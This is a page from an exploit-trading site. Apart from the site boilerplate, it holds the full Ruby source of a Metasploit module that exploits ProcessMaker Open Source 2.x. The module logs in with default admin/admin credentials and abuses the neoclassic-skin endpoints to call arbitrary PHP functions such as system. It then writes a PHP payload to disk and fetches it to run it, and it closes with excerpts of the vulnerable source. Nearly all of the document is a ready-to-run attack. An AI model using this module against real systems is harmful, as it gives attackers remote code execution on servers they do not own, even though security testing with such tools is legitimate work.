0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ProcessMaker Open Source Authenticated PHP Code Execution
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "ProcessMaker Open Source Authenticated PHP Code Execution", 'Description' => %q{ This module exploits a PHP code execution vulnerability in the 'neoclassic' skin for ProcessMaker Open Source which allows any authenticated user to execute PHP code. The vulnerable skin is installed by default in version 2.x and cannot be removed via the web interface. }, 'License' => MSF_LICENSE, 'Author' => 'Brendan Coles <bcoles[at]gmail.com>', 'References' => [ ['URL' => 'http://bugs.processmaker.com/view.php?id=13436'] ], 'Payload' => { 'Space' => 8190, # HTTP POST 'DisableNops'=> true, 'BadChars' => "\x00" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ # Tested on: # * Windows XP SP3 - ProcessMaker Open Source version 2.5.1, 2.5.0, 2.0.23 # * Debian Linux - ProcessMaker Open Source version 2.0.45 ['ProcessMaker Open Source 2.x (PHP Payload)', { 'auto' => true }] ], 'Privileged' => false, # Privileged on Windows but not on *nix targets 'DisclosureDate' => 'Oct 24 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('USERNAME', [true, 'The username for ProcessMaker', 'admin']), OptString.new('PASSWORD', [true, 'The password for ProcessMaker', 'admin']) ], self.class) end # # Send command for execution # def execute_command(cmd, opts = { :php_function => 'system' } ) # random vulnerable path # confirmed in versions 2.0.23 to 2.5.1 vuln_url = [ '/sysworkflow/en/neoclassic/appFolder/appFolderAjax.php', '/sysworkflow/en/neoclassic/cases/casesStartPage_Ajax.php', '/sysworkflow/en/neoclassic/cases/cases_SchedulerGetPlugins.php' ].sample # shuffle POST parameters vars_post = Hash[{ 'action' => opts[:php_function], 'params' => cmd }.to_a.shuffle] # send payload vprint_status("#{peer} - Attempting to execute: #{cmd}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, vuln_url), 'cookie' => @cookie, 'vars_post' => vars_post }) res end # # Login # def login(user, pass) # shuffle POST parameters vars_post = Hash[{ 'form[USR_USERNAME]' => Rex::Text.uri_encode(user, 'hex-normal'), 'form[USR_PASSWORD]' => Rex::Text.uri_encode(pass, 'hex-normal'), }.to_a.shuffle] # send login request print_status("#{peer} - Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "/sysworkflow/en/neoclassic/login/authentication.php"), 'cookie' => @cookie, 'vars_post' => vars_post }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE print_error("#{peer} - Connection failed") return false end if res and res.code == 200 and res.body =~ /Loading styles and images/ print_good("#{peer} - Authenticated as user '#{user}'") return true else print_error("#{peer} - Authenticating as user '#{user}' failed") return false end end # # Check credentials are valid and confirm command execution # def check # login @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" unless login(datastore['USERNAME'], datastore['PASSWORD']) return Exploit::CheckCode::Unknown end # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) print_status("#{peer} - Sending check") begin res = execute_command("echo #{fingerprint}") if res and res.body =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable elsif res return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE print_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown end # # Write payload to filesystem # def upload # Random PHP function for command execution php_function = [ 'exec', 'shell_exec', 'passthru', 'system' ].sample # upload payload code = "<?php #{payload.encoded} ?>" print_status("#{peer} - Sending payload '#{@fname}' (#{code.length} bytes)") begin res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function } ) if res and res.code == 200 print_good("#{peer} - Payload sent successfully") register_files_for_cleanup(@fname) else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE fail_with(Failure::Unreachable, "#{peer} - Connection failed") end end def exploit # login @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" unless login(datastore['USERNAME'], datastore['PASSWORD']) fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # upload payload @fname = "#{rand_text_alphanumeric(rand(10)+10)}.php" upload # execute payload print_status("#{peer} - Retrieving file '#{@fname}'") send_request_cgi({'uri' => normalize_uri(target_uri.path, "#{@fname}")}) end end # # Source # =begin appFolder/appFolderAjax.php 22:if (($_REQUEST['action']) != 'rename') { 23: $functionName = $_REQUEST ['action']; 24: $functionParams = isset ($_REQUEST ['params']) ? $_REQUEST ['params'] : array (); 26: $functionName ($functionParams); =end =begin cases/casesStartPage_Ajax.php 16:$functionName = $_REQUEST['action']; 18:$functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array (); 19:$functionName( $functionParams ); =end =begin cases/cases_SchedulerGetPlugins.php 16:$functionName = $_REQUEST['action']; 18:$functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array (); 19:$functionName( $functionParams ); =end # 0day.today [2024-12-23] #